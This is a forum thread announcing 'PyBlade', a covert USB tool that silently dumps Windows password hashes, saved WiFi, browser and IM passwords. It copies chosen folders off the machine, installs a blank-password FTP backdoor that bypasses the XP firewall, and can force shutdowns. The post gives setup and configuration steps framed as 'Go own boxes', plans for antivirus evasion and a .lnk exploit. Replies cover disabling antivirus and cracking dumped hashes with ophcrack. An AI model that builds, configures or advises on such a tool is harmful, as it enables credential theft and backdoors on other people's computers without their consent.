Jump to content

Pyblade


sablefoxx

Recommended Posts

PyBlade v0.3



About:
Some people have been asking for an updated switchblade to run on Vista/7 computers so I thought I'd throw something together. It's a work in progress, I'm also fairly new to Python so no making fun of my code :D Please download and report bugs or requested features!

Current Abilities:
-Gathers system info, running processes, and local IP settings
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)
-Keyboard Randomizer payload
-Landmine payload
-Emo Computer payload
-Rick Roll payload
-IE Homepage payload
-Save logs in .txt, .html, or .xml format
-U3 support via .u3p file
-Support for file slurping
-FTP backdoor installer (w/ XP Firewall bypass)


Planned Updates:

-Netcat backdoor installer
-AV Bypass / Evade
-Save all logs in .html / .xml format

Downloads:
PyBlade v0.3 ==> md5: a9b10c99eb2f2ecbabefb0f908a1e3bf
PyBlade Source Code v0.3 (Includes payloads' source code)
U3 Support (.u3p) *BETA*

*** Change Log ***

v0.1
-Gathers system info, running processes, and network connections
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)


v0.2
-Added Keyboard Randomizer payload
-Added Landmine payload
-Added Change IE homepage payload
-Added comments to code
-Changed sysinfo to collect local IP settings
-Added options to save logs as .txt, .html, or .xml
-Added U3 support
-Checks to see if Firefox is installed before dumping passwords


v0.3
-Added Emo Computer payload (harmless don't worry)
-Added Random Rick Roll payload
-Added support for file slurping
-Added icons for .exe's
-Added FTP Server backdoor
-Correctly sets file extensions when saving logs in .html/.xml
-Added ability to bypass XP Firewall, and hide exceptions from the GUI
-Added time stamps to log directories



*** Quick Setup Guide ***


Setup for Non-U3 Drives:
0. Obtain a USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root of your USB drive
3. Edit blade.conf to do your bidding (see below)
4. Go own boxes

Setup for Unmodified U3 Drives:
0. Obtain a U3 USB drive, and put on a
album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root the flash partition on the U3 drive
3. Edit blade.conf to do your bidding (see below)
4. Download F_Bex.u3p (see above)
5. Open the U3 menu, click "Add Programs" and "Install from My Computer"
6. Select F_Bex.u3p, and set it to automatically run when the drive is inserted
7. Go own boxes

Configure Your Blade:
1. Open "blade.conf" in your favorite text editor (or notepad)
2. Enable/Disable programs by changing their execute value (Enable = 1)
Here are the default settings for v0.3:
# --------------------------------
#  SwitchBlade Configuration File
# --------------------------------

# Log File Type
#   Possible values; text, html, xml
log=html

# System Dumps
sysinfo=1
pwdump=1
wifi=1
mspass=1
iepw=1
iehist=1
ffpw=1
chromepw=1

# Payloads
keyrand=0
landmine=0
rickroll=0
emo=0

# Change IE Homepage
iehome=0
iehome_url=http://google.com

# Backdoors
ftpme=0


# File Slurping 
#   Seperate multiple directories using;'s
slurp=0
slurp_dirs=C:\Files;C:\Files2


Note that lines starting with '#' are comments, and are ignored during execution, do NOT comment out lines to disable programs, just set their execute value to 0

3. Some lines contain strings;
logs= Change this to set how the log files are saved (.log, .html, .xml)
iehome_url= If the IE Homepage payload is enabled (iehome=1), this is the URL that the homepage will be set to.
slurp_dirs= This is a list of the directories you want copied onto your drive, you can list multiple directories by separating them with semicolons
4. To manually execute run "bex.exe"

Payloads:
Keyboard Randomizer: This program randomizes all keyboard input while its running (keyrand).
Landmine: Selects a key at random and forcefully turns off the computer when it's pressed (landmine).
Emo Computer: The computer becomes sad and pretends to delete all the files on the computer (emo).
FTPme: Installs an FTP server on the root of the C: drive with a blank username/password (ftpme).
Random Rick Roller: Will open up rick rolls at random time intervals (rickroll).
Note: All payloads are activated on reboot (except for FTPme).


Let me know if you find bugs, and come say hi on IRC!
Edited by sablefoxx
Link to comment
Share on other sites

  • Replies 93
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

Whoops, forgot a file you may want to re-download it, also just found a couple bugs, working on a fixes.

Edit --Fixed problems!

Edited by sablefoxx
Link to comment
Share on other sites

I thought it stopped things from autorunning with .inf?

It should still work on XP, I'm working on getting the new .lnk icon exploit to run it on unpatched Vista/Seven computers, and U3 support.

Edited by sablefoxx
Link to comment
Share on other sites

Updated to v0.2, added payloads, and some other small stuff.

Pretty cool, needs a AV killer or something, most AVs destroy it before it gets a chance to do anything useful/

Hmm... I have yet to see this done well, perhaps I'll try something.

I could easily add an encrypted .rar where the files in question could be stored until after the AV has been killed or disabled.

"bex.exe" shouldn't be flagged VirusTotal

The problem is that killing AV software isn't as simple as making a taskkill system call, but perhaps we can disable it or crash it (without crashing the OS). The problem with this method is that we can only target specific titles.

Edited by sablefoxx
Link to comment
Share on other sites

Sorry for my noobness, but can you make a tutorial how to use these scripts? And hwo to make it work with U3 FlashDrive. thanks and I do apologize for my ignorance on this awesome software. Thanks. Good Job Batman

I'll throw something together, brb.

Link to comment
Share on other sites

I noticed you removed the .ink icon exploit as part of your planned features. Is it impossible to implement it?

More difficult then originally anticipated, may add it later.

Link to comment
Share on other sites

just tried it on a vista machine. i had to disable AVG security cause it was being a pain. every thing seems to be working great. didnt get any passwords though cause i guess the user didnt save them. im gonna have to try it on anouther computer. is there any way it can get the windows login password too?

Link to comment
Share on other sites

just tried it on a vista machine. i had to disable AVG security cause it was being a pain. every thing seems to be working great. didnt get any passwords though cause i guess the user didnt save them. im gonna have to try it on anouther computer. is there any way it can get the windows login password too?

Yeap, the 'pwdump' log file contains the login password hashes, you'll need to crack them using a program like ophcrack

Link to comment
Share on other sites

Yeap, the 'pwdump' log file contains the login password hashes, you'll need to crack them using a program like ophcrack

this is whats in my pwdump log file. is there something wrong here? cause the machine does have a login password. i know the password but why wont it dump it? or is this what its supposed to look like and i have to crack it with that program?

Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************:::

Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::

VM:1000:NO PASSWORD*********************:NO PASSWORD*********************:::

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...